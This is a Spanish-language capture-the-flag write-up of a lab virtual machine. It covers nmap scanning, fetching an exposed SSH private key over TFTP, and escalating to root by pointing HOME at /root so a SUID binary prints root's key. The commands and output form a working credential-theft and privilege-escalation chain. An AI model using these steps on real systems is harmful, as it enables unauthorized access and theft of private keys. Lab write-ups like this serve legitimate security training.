Comenzamos con un escaneo general y luego uno específico de puertos:
nmap -sC -sV -p21,22,80 -oN 02-targeted 192.168.1.96
Nmap scan report for 192.168.1.96
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.10
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c6:27:ab:53:ab:b9:c0:20:37:36:52:a9:60:d3:53:fc (RSA)
| 256 48:3b:28:1f:9a:23:da:71:f6:05:0b:a5:a6:c8:b7:b0 (ECDSA)
|_ 256 b3:2e:7c:ff:62:2d:53:dd:63:97:d4:47:72:c8:4e:30 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:2D:42:5D (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 17 19:53:32 2023 -- 1 IP address (1 host up) scanned in 6.93 secondsDel escaneo rescatamos: FTP anónimo habilitado, SSH (22) y un servidor HTTP (80). En el navegador, el sitio muestra una pista:
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobodyTenemos un usuario potencial, alexia, y la mención de una id_rsa expuesta. Tras revisar código fuente, consola y cabeceras sin resultados, ampliamos el escaneo a UDP, donde aparece un servicio TFTP:
nmap -sU --top-ports 250 192.168.1.96 -oN 03-udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 20:12 -03
Nmap scan report for 192.168.1.96
Host is up (0.00058s latency).
Not shown: 248 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 08:00:27:2D:42:5D (Oracle VirtualBox virtual NIC)Nos conectamos por TFTP y descargamos la id_rsa:
❯ tftp 192.168.1.96
tftp> get id_rsa
tftp> quitAjustamos los permisos de la clave y nos conectamos por SSH como alexia, obteniendo la primera flag:
❯ chmod 600 id_rsa
❯ ssh -i id_rsa alexia@192.168.1.96
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep 30 11:06:15 2020
alexia@hommie:~$sudo -l no ofrece vías, así que buscamos binarios SUID y encontramos showMetheKey:
find \-perm -4000 2>/dev/nullAl ejecutarlo, muestra una clave privada SSH. Analizamos sus cadenas:
setuid
...
setgid
...
cat $HOME/.ssh/id_rsa
...El binario es SUID y lee la clave desde $HOME/.ssh/id_rsa. Abusamos de la variable de entorno HOME para que apunte a /root:
export HOME=/rootAl ejecutar de nuevo el binario, nos muestra la clave privada de root. Desde nuestra máquina iniciamos una conexión SSH como root con esa clave, obteniendo acceso y capturando la bandera.
Fin.